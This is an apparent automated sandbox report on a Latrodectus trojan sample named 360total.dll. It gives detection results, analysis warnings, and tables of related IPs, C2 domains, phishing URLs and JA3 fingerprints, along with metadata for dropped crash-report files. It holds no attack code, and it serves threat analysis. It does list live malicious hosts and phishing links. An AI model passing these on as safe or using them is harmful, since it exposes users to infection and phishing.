                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Sample name:360total.dll.dll
                                                        (renamed file extension from exe to dll)
                                                        Original Sample Name:360total.dll.exe
                                                        Detection:MAL
                                                        Classification:mal100.spre.troj.spyw.evad.winDLL@90/16@10/7
                                                        EGA Information:
                                                        • Successful, ratio: 66.7%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 6
                                                        • Number of non-executed functions: 278

                                                        Warnings

                                                        • Max analysis timeout: 600s exceeded, the analysis took too long
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 72.21.81.240, 192.229.211.108, 172.217.165.195, 142.251.107.84, 142.251.35.238, 34.104.35.123, 199.232.210.172, 52.182.143.212, 20.189.173.20, 142.250.217.163, 142.250.217.174
                                                        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, self.events.data.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com
                                                        • Execution Graph export aborted for target rundll32.exe, PID 180 because there are no executed function
                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • VT rate limit hit for: 360total.dll.dll

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        23:15:27API Interceptor2x Sleep call for process: WerFault.exe modified
                                                        23:15:51API Interceptor34020193x Sleep call for process: rundll32.exe modified
                                                        23:17:46API Interceptor2x Sleep call for process: WMIC.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        239.255.255.250https://sites.google.com/authorizewebcenter.com/565hu4?usp=sharingGet hashmaliciousHTMLPhisherBrowse
                                                          http://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                            phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.emlGet hashmaliciousHTMLPhisherBrowse
                                                              Lab5-1.docxGet hashmaliciousUnknownBrowse
                                                                Purchase Order is approved26042024.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                  https://messageis.ru/pre/profile/messageGet hashmaliciousHTMLPhisherBrowse
                                                                    https://herofargwsmnncmwsrcnmwsncmwscnm.popsy.site/Get hashmaliciousHTMLPhisherBrowse
                                                                      MSG.docxGet hashmaliciousUnknownBrowse
                                                                        http://trailersalesandparts.caGet hashmaliciousUnknownBrowse
                                                                          MSG.docxGet hashmaliciousUnknownBrowse
                                                                            104.21.84.207neo.msiGet hashmaliciousLatrodectusBrowse
                                                                              104.21.46.75ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                  172.67.219.28neo.msiGet hashmaliciousLatrodectusBrowse
                                                                                    ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                      360total.dll.dllGet hashmaliciousLatrodectusBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        jarinamaers.shopneo.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 172.67.136.103
                                                                                        neo.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 104.21.46.75
                                                                                        ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 104.21.46.75
                                                                                        Document_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                                                                        • 172.67.136.103
                                                                                        360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                        • 172.67.136.103
                                                                                        ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 104.21.46.75
                                                                                        pewwhranet.comneo.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 104.21.84.207
                                                                                        Util.dllGet hashmaliciousBazar Loader, LatrodectusBrowse
                                                                                        • 172.67.197.34
                                                                                        grizmotras.comneo.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 172.67.219.28
                                                                                        ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 172.67.219.28
                                                                                        Document_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                                                                        • 104.21.59.82
                                                                                        360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                        • 172.67.219.28
                                                                                        Util.dllGet hashmaliciousBazar Loader, LatrodectusBrowse
                                                                                        • 104.21.59.82

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUShttp://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.174
                                                                                        phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        https://messageis.ru/pre/profile/messageGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.88.109
                                                                                        MSG.docxGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.2.184
                                                                                        http://trailersalesandparts.caGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        MSG.docxGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.2.184
                                                                                        https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-XGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.89.211
                                                                                        https://doc-42.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.3.184
                                                                                        https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/Get hashmaliciousUnknownBrowse
                                                                                        • 104.18.12.112
                                                                                        https://webcompanion.com/nano_download.php?Get hashmaliciousUnknownBrowse
                                                                                        • 104.19.208.152
                                                                                        CLOUDFLARENETUShttp://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.174
                                                                                        phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        https://messageis.ru/pre/profile/messageGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.88.109
                                                                                        MSG.docxGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.2.184
                                                                                        http://trailersalesandparts.caGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        MSG.docxGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.2.184
                                                                                        https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-XGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.89.211
                                                                                        https://doc-42.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.3.184
                                                                                        https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/Get hashmaliciousUnknownBrowse
                                                                                        • 104.18.12.112
                                                                                        https://webcompanion.com/nano_download.php?Get hashmaliciousUnknownBrowse
                                                                                        • 104.19.208.152
                                                                                        CLOUDFLARENETUShttp://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.174
                                                                                        phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        https://messageis.ru/pre/profile/messageGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.88.109
                                                                                        MSG.docxGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.2.184
                                                                                        http://trailersalesandparts.caGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        MSG.docxGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.2.184
                                                                                        https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-XGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.89.211
                                                                                        https://doc-42.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.3.184
                                                                                        https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/Get hashmaliciousUnknownBrowse
                                                                                        • 104.18.12.112
                                                                                        https://webcompanion.com/nano_download.php?Get hashmaliciousUnknownBrowse
                                                                                        • 104.19.208.152

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        1138de370e523e824bbca92d049a3777MSG.docxGet hashmaliciousUnknownBrowse
                                                                                        • 23.1.237.91
                                                                                        https://www.clktoro.com/feed/click/?t1=128&tid=859&uid=26&subid=remotescripps.org&id=62b00eca6d15ba41d06e054ec8234620:c5cc33c8f67a8e2157054b6a1a46513330d8d1b9ba254759e28d5e39682faf3a0c638282c2c64e9d5352d1ed667ebaaf8201abc8c47aea233add3225b515fb85693743b12c7509aae6fe6327275ef08dc3f481903563d1550be49405e93a390c41176fe292821b7d6098f34b28b9e7b3c1a327f168218dd37d959e1d8326a3dc7910042cd769fb91dfb171de393907f5870d1100482cb158754118b401727ac226cffc957846c78b0e9abcca8d32d5a6ad75dd1af64e7feee6f847ba1695ac8b9515c5fe28cc4005f0012c33f25f14967186986fa0130af2fc961a6ad412c9b4aa8c9bb8de73d1c785c14d432fe083fc1215c9564a8991d6fc9805ac127a42ffdfadf6dae0f2731324a242c43e3fceec3023a2155939fe1a27676e4a6a87cfc84b770a7bc9f80a549fd09cfb1ad645853bdfb1b7639d71e11035e1789b964e38c91352f7c5a319e5df29671022a79d04Get hashmaliciousUnknownBrowse
                                                                                        • 23.1.237.91
                                                                                        neo.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 23.1.237.91
                                                                                        https://unilever3.demdex.net/firstevent?d_event=click&d_bu=317196&c_medium=display&c_destination=Retailer&c_country=BD&c_campaignname=L-LifebuoyHandsanitizerLaunchComm&c_prodcat=CH1097&c_brandcode=BH0300&d_adgroup=All_KV&c_contenttype=display&c_source=Dhaka%20Tribune&d_rd=https://campaign-statistics.com/link_click/PidJvkyg2S_O4JTm/159dfdb0ade49a7c5597d3c1d9bd3d8aGet hashmaliciousUnknownBrowse
                                                                                        • 23.1.237.91
                                                                                        https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTAxOTIyLCJtZXNzYWdlX2lkIjoiMGd4d3poYXc3czloeGZoZWNuNjNuYnFwIzg0YjRlN2VjLTdhZjUtNDU5Yi1hNTYxLWE1ZmVlMTE3NTllNiIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjM3OTIyLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMGphbWVzLmZheUBjb3VudHluYXRpb25hbGJhbmsuY29tJnBhdGhzPWFib3ZlJmxpbms9RmF4X091dGxvb2siLCJpbmRpdmlkdWFsX2lkIjoiNDA4YWI4OGRlY2JmNDFjMjRhYTZhMDRlOWU1OWMzZDAifQ.i-tkK1Lnys-MM487ot1MrSYQb6ExLgZNRQbgsH8B2K0Get hashmaliciousCaptcha PhishBrowse
                                                                                        • 23.1.237.91
                                                                                        Settlement DOL 08262024 - Victoria Brignon - Reference #27224675-2722934.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 23.1.237.91
                                                                                        file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                        • 23.1.237.91
                                                                                        https://runrun.it/share/form/0GZMCgHSxRh4PBOMGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 23.1.237.91
                                                                                        InmateExport.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.1.237.91
                                                                                        http://svif-venezuela.com/Get hashmaliciousUnknownBrowse
                                                                                        • 23.1.237.91
                                                                                        28a2c9bd18a11de089ef85a160da29e4wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        https://sites.google.com/authorizewebcenter.com/565hu4?usp=sharingGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        http://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        Lab5-1.docxGet hashmaliciousUnknownBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        Purchase Order is approved26042024.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        https://messageis.ru/pre/profile/messageGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        MSG.docxGet hashmaliciousUnknownBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        http://trailersalesandparts.caGet hashmaliciousUnknownBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-XGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        https://doc-42.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 40.126.28.23
                                                                                        • 23.46.214.6
                                                                                        • 52.165.165.26
                                                                                        a0e9f5d64349fb13191bc781f81f42e1Purchase Order is approved26042024.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        • 20.42.73.28
                                                                                        https://control.mailblaze.com/index.php/survey/wq790f4mf09e0Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                        • 20.42.73.28
                                                                                        neo.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 20.42.73.28
                                                                                        z55NF-Faturada-23042024.msiGet hashmaliciousMicroClipBrowse
                                                                                        • 20.42.73.28
                                                                                        ePI4igo4y1.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 20.42.73.28
                                                                                        file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                        • 20.42.73.28
                                                                                        file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                        • 20.42.73.28
                                                                                        http://cleverchoice.com.auGet hashmaliciousUnknownBrowse
                                                                                        • 20.42.73.28
                                                                                        https://therufus.org/download.phpGet hashmaliciousUnknownBrowse
                                                                                        • 20.42.73.28
                                                                                        j1zkOQTx4q.exeGet hashmaliciousRisePro StealerBrowse
                                                                                        • 20.42.73.28
                                                                                        37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28
                                                                                        neo.msiGet hashmaliciousLatrodectusBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28
                                                                                        file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28
                                                                                        Dragons Dogma 2 v1.0 Plus 36 Trainer.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28
                                                                                        Dragons Dogma 2 v1.0 Plus 36 Trainer.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28
                                                                                        file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28
                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28
                                                                                        BundleSweetIMSetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28
                                                                                        DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28
                                                                                        Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                        • 104.21.84.207
                                                                                        • 104.21.46.75
                                                                                        • 172.67.219.28

                                                                                        Dropped Files

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dllneo.msiGet hashmaliciousLatrodectusBrowse
                                                                                          neo.msiGet hashmaliciousLatrodectusBrowse

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_360_886edd4b87b9ecd618b1e464327a85149d5ee8c2_9cecb875_a6f8bd53-9d4e-49b1-a9c1-44db6d88d736\Report.wer

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):0.8266019060060473
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:kXFR56iKwyKyGsj94Rvm7qfkQXIDcQSc6EcEwcw3QrXaXz+HbHgSQgJjmh88WpoM:S7giKwyGP0MAaE7ji5zuiFMZ24lO8I
                                                                                            MD5:F8525B7222682BC585041BA1A85827C8
                                                                                            SHA1:F0CEE31C998E36E95D91378FB2973B9A079BD903
                                                                                            SHA-256:2B052716F3B61DCD1BEE5416FDAA98C5D19700F20E5B6B3F836A92C84E96E8A4
                                                                                            SHA-512:261DF04E7F8E582A508F58B998DF4BE0F0023F514C5AD1815F21841FDE07E2B37DAFE8A49E95BDE9F4DB5AD95EA98C29D90A23EB9860D7610994E3921FCA366F
                                                                                            Malicious:false
                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.3.9.7.2.9.3.2.1.6.5.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.3.9.7.3.0.0.1.7.0.2.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.f.8.b.d.5.3.-.9.d.4.e.-.4.9.b.1.-.a.9.c.1.-.4.4.d.b.6.d.8.8.d.7.3.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.0.6.2.b.9.1.-.9.3.c.4.-.4.7.e.4.-.8.0.8.9.-.a.e.a.5.5.4.0.e.7.a.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.3.6.0.t.o.t.a.l...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.8.-.0.0.0.1.-.0.0.1.4.-.6.3.d.7.-.2.3.d.0.1.e.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_360_f6ce5fb8c554a1c5617cb52ea4bda5a5f52864d1_9cecb875_f4e6ccbc-37d4-4f28-84bd-7203eb51c087\Report.wer

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):0.8269554026159092
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Q2vawiKwyGJ0mHzmAji5zuiFMZ24lO8I:bvawiKdGqmHzdjEzuiFMY4lO8I
                                                                                            MD5:29A5F0445B234E597C8B199AA977D89B
                                                                                            SHA1:6F4B3174C6EE8EE428701DEE4941ED267BE988AA
                                                                                            SHA-256:F6A4778AF760396A2D995126B3CE9EDEAB9982EBE86C61A8BE704BD504273157
                                                                                            SHA-512:FB50BFE91E7A5A6A74B9058EDF12CE0A44D0BFC07BFE0B9E61D5137E22B4A547316F65CB4BB6F3A11872D0C2170A9A989DCAED21D5117A9A6A51D193CAE61CB8
                                                                                            Malicious:false
                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.3.9.7.0.7.6.2.8.4.1.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.3.9.7.0.8.0.8.1.5.4.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.e.6.c.c.b.c.-.3.7.d.4.-.4.f.2.8.-.8.4.b.d.-.7.2.0.3.e.b.5.1.c.0.8.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.c.9.4.2.a.b.-.b.b.8.a.-.4.0.2.0.-.a.5.c.1.-.6.6.8.d.9.e.c.2.9.d.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.3.6.0.t.o.t.a.l...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.8.-.0.0.0.1.-.0.0.1.4.-.6.3.d.7.-.2.3.d.0.1.e.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERA484.tmp.dmp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 14 streams, Fri Apr 26 21:15:07 2024, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):57608
                                                                                            Entropy (8bit):1.7330274216494976
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:kJANn2dcHowOMkTqi1cPtzKRdF+lqL3p9AUW0q73n:Qen2dcHoHNeikyFp3AUWT
                                                                                            MD5:E6D230C5825F694AAADD1EDC194682B4
                                                                                            SHA1:5F822F74118A6D9B6FCFC6E2841995841A7A3D7F
                                                                                            SHA-256:BE08DFCB6D29DCFE803B44188C151CBA9D92C7691D32D5C5F56F07FC7987AB7B
                                                                                            SHA-512:AFD9BE1C4695E5D8742CD5B2ED5E34E994F02B2232C59B939073B6054DD6046C67C89CC84B272185B3D9B0DE8C7B77BE636D621D47D0B9E7E6E6BECB1BEC9547
                                                                                            Malicious:false
                                                                                            Preview:MDMP..a..... .......[.,f.........................................-..........T.......8...........T.......................................................................................................................eJ......8.......Lw......................T.......8...Z.,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERA531.tmp.WERInternalMetadata.xml

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8778
                                                                                            Entropy (8bit):3.6972004405537473
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:R6l7wVeJJHt6YPDwurgmf73eTprw89bwbnTfqWjm:R6lXJZt6Y7wagmf73UwbTf76
                                                                                            MD5:AA1D867BCB817FA815FFF1D681374F55
                                                                                            SHA1:C9FCFF72C190EE2DDFF86506AE7514B15C5FBF71
                                                                                            SHA-256:257CAA1EBB69609B69EA8FB6F42AC9B21BC6CF4F3E4EE8BE5ED02B9B96E3A557
                                                                                            SHA-512:0EAFBC5B2EED1E372606A73369D7A4DB02FF4AF9C3052CC199A60CC15BCB46221D62B2A08D143C65532DF107C891ABCF7F5439E56E5C59A11F3DFE612F29ADB2
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.0.0.<./.P.i.

                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERA551.tmp.xml

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4764
                                                                                            Entropy (8bit):4.4685900332540465
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwWl8zsDJg771I90oSWpW8VYVvYm8M4JCECyfF5/yq85moRHptSTSDd:uIjfdI7HW7VVJLcHpoODd
